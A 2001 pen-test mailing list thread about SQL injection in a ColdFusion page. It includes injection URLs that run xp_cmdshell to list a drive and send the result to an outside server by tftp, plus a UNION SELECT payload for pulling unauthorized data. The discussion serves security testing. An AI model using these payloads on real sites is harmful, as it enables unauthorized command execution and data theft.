RE: CFM SQL injection

["Wertheimer, Ishai" <iwertheimer () kpmg com>]

Note that the response you got was from Oracle sql server and the
xp_cmdshell is for MS-SQL Server ...

You should better use union or alike get unauthorized data from the
database.

Ishai Wertheimer


-----Original Message-----
From: Charlie Liserne [mailto:Chili () SexMagnet com]
Sent: Monday, December 24, 2001 9:14 PM
To: pen-test () security-focus com
Subject: Re: CFM SQL injection


Hi,

I'm trying to get the C:/ directory, but I'm not able to do that. This is a
non-intrusive pen-test, so I wouldn't like to have to exec something like:

http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'dir
*.* > c:\listing.txt' --'
http://www.server.com/page.cfm?page_id=9999; EXEC master..xp_cmdshell 'tftp
listing.txt my.server' --'

I would like to get a listing of the c: directory in a clean way, without
writing to disk, and get the results appearing in my web browser.

I know some column names, but I can't figure how could be possible read or
modify it. Also, I'm not able to get a list of the directory; The ' escape
character isn't necesary, but when i do:

http://www.server.es/page.cfm?page_id=12; EXEC master..xp_cmdshell 'dir';

The response is:
ODBC Error Code = S1000 (General error)
[Oracle][ODBC][Ora]ORA-00911: invalid character

Where are the invalid character?? How could be possible to take advantage
from a coldfusion error programming? Sometime ago, in this mailing list
appears a message from Rick Redman (Minga), speaking about how easy is to
break into a Coldfusion app if the programmer aren't 100% trained in secure
coding practices. I was searching in the Internet about this, and how to
take advantage of the programming errors, but I can't figure out how to
pervert a cfm application. Do you know if there are any document about
this?

Best Regards,
Charlie.


*********** REPLY SEPARATOR  ***********


> It looks like the query that you're attacking isn't prepending and
> appending quotes to your input.  The string build probably looks a lil'
> sumthin' like this:
>
> Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID
=
> " & strPageID
>
>    This means that there is no need to use quotes in order to perform a
> successful injection.  So, try something like this:
>
> http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM
> OtherTable WHERE 1=1
>
>    Hopefully this will return an error complaining about an invalid table
> name, or at least another error that may give you a better idea of what
the
> web application is doing with your argument.




----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
*****************************************************************************
The information in this email is confidential and may be legally privileged.
It is intended solely for the addressee. Access to this email by anyone else
is unauthorized. 

If you are not the intended recipient, any disclosure, copying, distribution
or any action taken or omitted to be taken in reliance on it, is prohibited
and may be unlawful. When addressed to our clients any opinions or advice
contained in this email are subject to the terms and conditions expressed in
the governing KPMG client engagement letter.         
*****************************************************************************

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/